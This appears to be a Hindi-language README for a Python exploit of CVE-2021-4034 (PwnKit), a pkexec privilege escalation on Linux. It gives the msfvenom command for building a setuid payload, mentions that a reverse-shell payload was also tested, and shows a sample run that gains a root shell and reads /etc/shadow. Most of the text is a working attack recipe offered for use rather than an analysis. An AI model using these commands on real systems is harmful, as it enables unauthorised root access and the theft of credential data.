
# CVE-2021-4034 (PwnKit) के लिए Python एक्सप्लॉइट जो pkexec के माध्यम से रूट विशेषाधिकारों तक पहुंच बढ़ाता है, msfvenom पेलोड के साथ रूट शेल उत्पन्न करता है।
Python3 कोड CVE-2021-4034 (PWNKIT) का शोषण करने के लिए। यह "क्या मैं इसे Python में काम करवा सकता हूँ?" का अभ्यास था, और एक मजबूत शोषण के रूप में अभिप्रेत नहीं है। यह मेरे लिए काम करता है, शायद बग हों।
डिफ़ॉल्ट पेलोड msfvenom से उत्पन्न root के रूप में एक शेल शुरू करता है:
msfvenom -p linux/x64/exec -f elf-so PrependSetuid=true | base64
मैंने linux/x64/shell_reverse_tcp का भी परीक्षण किया है। सुनिश्चित करें कि आप msfvenom में PrependSetuid=true तर्क शामिल करें, अन्यथा आपको केवल उपयोगकर्ता के रूप में एक शेल मिलेगा, root के रूप में नहीं।
कोड blasty से लिया गया है, मूल यहाँ उपलब्ध है
$ python CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
uid=0(root) gid=1000(jra) groups=1000(jra),4(adm),27(sudo),119(lpadmin),998(lxd)
# whoami
root
# head /etc/shadow
root:*:18709:0:99999:7:::
daemon:*:18709:0:99999:7:::
bin:*:18709:0:99999:7:::
sys:*:18709:0:99999:7:::
sync:*:18709:0:99999:7:::
games:*:18709:0:99999:7:::
man:*:18709:0:99999:7:::
lp:*:18709:0:99999:7:::
mail:*:18709:0:99999:7:::
news:*:18709:0:99999:7:::
#